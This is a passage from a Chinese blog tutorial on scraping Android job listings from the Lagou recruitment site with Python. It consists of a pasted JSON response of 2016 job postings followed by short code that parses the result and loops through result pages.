13:55:08","companyId":28422,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"成都品果科技有限公司","city":"北京","salary":"18k-30k","financeStage":"成长型(B轮)","positionId":290875,"companyLogo":"i/image/M00/02/F3/Cgp3O1ah7FuAbSnkAACMlcPiWXk393.png","positionFirstType":"技术","companyName":"camera360","positionAdvantage":"高大上的福利待遇、发展前景等着你哦!","industryField":"移动互联网","score":1339,"district":"海淀区","companyLabelList":["年终分红","绩效奖金","年底双薪","五险一金"],"deliverCount":6,"leaderName":"徐灏","companySize":"15-50人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":0,"imstate":"disabled","createTimeSort":1462859708000,"positonTypesMap":null,"hrScore":80,"flowScore":188,"showCount":1199,"pvScore":19.745453118211834,"plus":"是","businessZones":["中关村","北京大学","苏州街"],"publisherId":389753,"loginTime":1462866640000,"appShow":0,"calcScore":false,"showOrder":1433137697136,"haveDeliver":false,"orderBy":71,"adWord":0,"formatCreateTime":"13:55发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 17:57:55","companyId":89004,"positionName":"Android","positionType":"移动开发","workYear":"不限","education":"学历不限","jobNature":"全职","companyShortName":"温州康宁医院股份有限公司","city":"杭州","salary":"10k-20k","financeStage":"上市公司","positionId":1410975,"companyLogo":"i/image/M00/02/C2/CgqKkVabp--APWTjAACHHJJxyPc207.png","positionFirstType":"技术","companyName":"的的心理","positionAdvantage":"上市公司内部创业团队","industryField":"移动互联网 
· 医疗健康","score":1335,"district":null,"companyLabelList":["年底双薪","股票期权","带薪年假","招募合伙人"],"deliverCount":9,"leaderName":"杨怡","companySize":"500-2000人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462874275000,"positonTypesMap":null,"hrScore":74,"flowScore":144,"showCount":2085,"pvScore":77.9570832081189,"plus":"是","businessZones":null,"publisherId":3655492,"loginTime":1462873104000,"appShow":711,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"17:57发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-09 09:46:32","companyId":113895,"positionName":"Android开发工程师","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"北京互动金服科技有限公司","city":"北京","salary":"15k-25k","financeStage":"成长型(不需要融资)","positionId":1473342,"companyLogo":"i/image/M00/03/D8/CgqKkVbEA_uAe1k4AAHTfy3RxPY812.jpg","positionFirstType":"技术","companyName":"互动科技","positionAdvantage":"五险一金 补充医疗 年终奖 福利津贴","industryField":"移动互联网 · O2O","score":1326,"district":"海淀区","companyLabelList":,"deliverCount":32,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":980,"adjustScore":48,"imstate":"today","createTimeSort":1462758392000,"positonTypesMap":null,"hrScore":82,"flowScore":153,"showCount":3741,"pvScore":67.01698353391613,"plus":"是","businessZones":["白石桥","魏公村","万寿寺","白石桥","魏公村","万寿寺"],"publisherId":3814477,"loginTime":1462874842000,"appShow":0,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":63,"adWord":0,"formatCreateTime":"1天前发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 16:50:51","companyId":23999,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"本科","jobNature":"全职","companyShortName":"南京智鹤电子科技有限公司","city":"长沙","salary":"8k-12k","financeStage":"成长型(A轮)","positionId":1804917,"companyLogo":"image1/M00/35/EB/CgYXBlWc5KGAVeL8AAAOi4lPhWU502.jpg","positionFirstType":"技术","companyName":"智鹤科技","positionAdvantage":"弹性工作制 技术氛围浓厚","industryField":"移动互联网","score":1322,"district":null,"companyLabelList":["股票期权","绩效奖金","专项奖金","年终分红"],"deliverCount":1,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":0,"imstate":"disabled","createTimeSort":1462870251000,"positonTypesMap":null,"hrScore":62,"flowScore":191,"showCount":283,"pvScore":15.939035855045429,"plus":"否","businessZones":null,"publisherId":282621,"loginTime":1462869967000,"appShow":0,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"16:50发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-08 23:12:56","companyId":24287,"positionName":"android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"杭州腾展科技有限公司","city":"杭州","salary":"15k-22k","financeStage":"成熟型(D轮及以上)","positionId":1197868,"companyLogo":"image1/M00/0B/7D/Cgo8PFTzIBOAEd2dAACMq9tQoMA797.png","positionFirstType":"技术","companyName":"腾展叮咚(Dingtone)","positionAdvantage":"每半年调整薪资,今年上市!","industryField":"移动互联网 · 社交网络","score":1322,"district":"西湖区","companyLabelList":["出国旅游","股票期权","精英团队","强悍的创始人"],"deliverCount":9,"leaderName":"魏松祥(Steve 
Wei)","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"disabled","createTimeSort":1462720376000,"positonTypesMap":null,"hrScore":71,"flowScore":137,"showCount":3786,"pvScore":87.51582865460942,"plus":"是","businessZones":["文三路","古荡","高新文教区"],"publisherId":2946659,"loginTime":1462891920000,"appShow":940,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":66,"adWord":0,"formatCreateTime":"2天前发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 09:38:43","companyId":19875,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"维沃移动通信有限公司","city":"南京","salary":"12k-24k","financeStage":"初创型(未融资)","positionId":938099,"companyLogo":"image1/M00/00/25/Cgo8PFTUWH-Ab57wAABKOdLbNuw116.png","positionFirstType":"技术","companyName":"vivo","positionAdvantage":"vivo,追求极致","industryField":"移动互联网","score":1320,"district":"建邺区","companyLabelList":["年终分红","五险一金","带薪年假","年度旅游"],"deliverCount":4,"leaderName":"暂没有填写","companySize":"2000人以上","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462844323000,"positonTypesMap":null,"hrScore":57,"flowScore":149,"showCount":981,"pvScore":72.14107985481958,"plus":"是","businessZones":["沙洲","小行","赛虹桥"],"publisherId":302876,"loginTime":1462871424000,"appShow":353,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":66,"adWord":0,"formatCreateTime":"09:38发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 09:49:59","companyId":20473,"positionName":"安卓开发工程师","positionType":"移动开发","workYear":"3-5年","education":"大专","jobNature":"全职","companyShortName":"广州棒谷网络科技有限公司","city":"广州","salary":"8k-15k","financeStage":"成长型(A轮)","positionId":1733545,"companyLogo":"image1/M00/0F/36/Cgo8PFT9AgGAciySAAA1THfEIAE433.jpg","positionFirstType":"技术","companyName":"广州棒谷网络科技有限公司","positionAdvantage":"五险一金 大平台 带薪休假","industryField":"电子商务","score":1320,"district":null,"companyLabelList":["项目奖金","绩效奖金","年终奖","五险一金"],"deliverCount":15,"leaderName":"大邹","companySize":"500-2000人","randomScore":0,"countAdjusted":false,"relScore":980,"adjustScore":48,"imstate":"today","createTimeSort":1462844999000,"positonTypesMap":null,"hrScore":79,"flowScore":144,"showCount":3943,"pvScore":77.78928844199473,"plus":"是","businessZones":null,"publisherId":235413,"loginTime":1462878251000,"appShow":1562,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"09:49发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-04 11:41:59","companyId":87117,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"本科","jobNature":"全职","companyShortName":"南京信通科技有限责任公司","city":"南京","salary":"10k-12k","financeStage":"成长型(不需要融资)","positionId":966059,"companyLogo":"image1/M00/3F/51/CgYXBlXASfuADyOsAAA_na14zho635.jpg?cc=0.6724986131303012","positionFirstType":"技术","companyName":"联创集团信通科技","positionAdvantage":"提供完善的福利和薪酬晋升制度","industryField":"移动互联网 · 
教育","score":1320,"district":"鼓楼区","companyLabelList":["节日礼物","带薪年假","补充医保","补充子女医保"],"deliverCount":4,"leaderName":"暂没有填写","companySize":"150-500人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462333319000,"positonTypesMap":null,"hrScore":88,"flowScore":143,"showCount":3161,"pvScore":79.41660570401937,"plus":"是","businessZones":["虎踞路","龙江","西桥"],"publisherId":2230973,"loginTime":1462871511000,"appShow":711,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":41,"adWord":0,"formatCreateTime":"2016-05-04","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 09:26:58","companyId":103051,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"大专","jobNature":"全职","companyShortName":"浙江米果网络股份有限公司","city":"杭州","salary":"12k-22k","financeStage":"成长型(A轮)","positionId":1233873,"companyLogo":"image2/M00/10/DF/CgqLKVYwKQSAR2p4AAJAM590SJM137.png?cc=0.17502541467547417","positionFirstType":"技术","companyName":"米果小站","positionAdvantage":"充分的发展成长空间","industryField":"移动互联网","score":1320,"district":"滨江区","companyLabelList":["年底双薪","股票期权","午餐补助","五险一金"],"deliverCount":5,"leaderName":"暂没有填写","companySize":"150-500人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"disabled","createTimeSort":1462843618000,"positonTypesMap":null,"hrScore":72,"flowScore":137,"showCount":1582,"pvScore":87.93158026917071,"plus":"是","businessZones":["江南","长河","西兴"],"publisherId":2992735,"loginTime":1462889479000,"appShow":312,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":63,"adWord":0,"formatCreateTime":"09:26发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 10:01:39","companyId":70044,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"大专","jobNature":"全职","companyShortName":"武汉平行世界网络科技有限公司","city":"武汉","salary":"9k-13k","financeStage":"初创型(天使轮)","positionId":664813,"companyLogo":"image2/M00/00/3E/CgqLKVXdccSAQE91AACv-6V33Vo860.jpg","positionFirstType":"技术","companyName":"平行世界","positionAdvantage":"弹性工作、带薪年假、待遇优厚、3号线直达","industryField":"电子商务 · 文化娱乐","score":1320,"district":"蔡甸区","companyLabelList":["年底双薪","待遇优厚","专项奖金","带薪年假"],"deliverCount":18,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462845699000,"positonTypesMap":null,"hrScore":76,"flowScore":128,"showCount":1934,"pvScore":99.6001810598155,"plus":"是","businessZones":["沌口"],"publisherId":1694134,"loginTime":1462892151000,"appShow":759,"calcScore":false,"showOrder":1433141412915,"haveDeliver":false,"orderBy":68,"adWord":0,"formatCreateTime":"10:01发布","totalCount":0,"searchScore":0.0}]}}}
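
这一大段返回值其实就是标准的 json,用 json.loads 解析之后按字段取值即可。下面是一个简单的示意(假设 return_data 就是上面 requests.post 的返回值,字段名都取自上面返回的数据):

import json

result = json.loads(return_data.text)
# content -> positionResult -> result 是一个职位列表
for job in result['content']['positionResult']['result']:
    print job['companyShortName'], job['positionName'], job['city'], job['salary']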












在XHR中点击JSON,就可以看到浏览器返回来的数据了。 是不是跟上面使用python程序抓取的一样呢?
 

dom_data.jpg

 
是不是很简单?
 
如果想获得第2页,第3页的数据呢?
 
只需要修改pn=x 中的值就可以了。
post_data = {'first':'true','kd':'Android','pn':'2'} #获取第2页的内容

如果想要获取全部内容,写一个循环语句就可以了。
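
比如像下面这样写一个简单的循环就可以逐页抓取(url 沿用上面抓包得到的地址,这里只留一个占位;页数范围也只是示意):

import requests

url = "......"  # 填上面抓包看到的 positionAjax 地址,原文中被截断,这里仅作占位
all_pages = []
for pn in range(1, 11):
    post_data = {'first': 'true', 'kd': 'Android', 'pn': str(pn)}
    return_data = requests.post(url, data=post_data)
    all_pages.append(return_data.text)
    print "page %d done" % pn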
 
版权所有,转载请说明出处:www.30daydo.com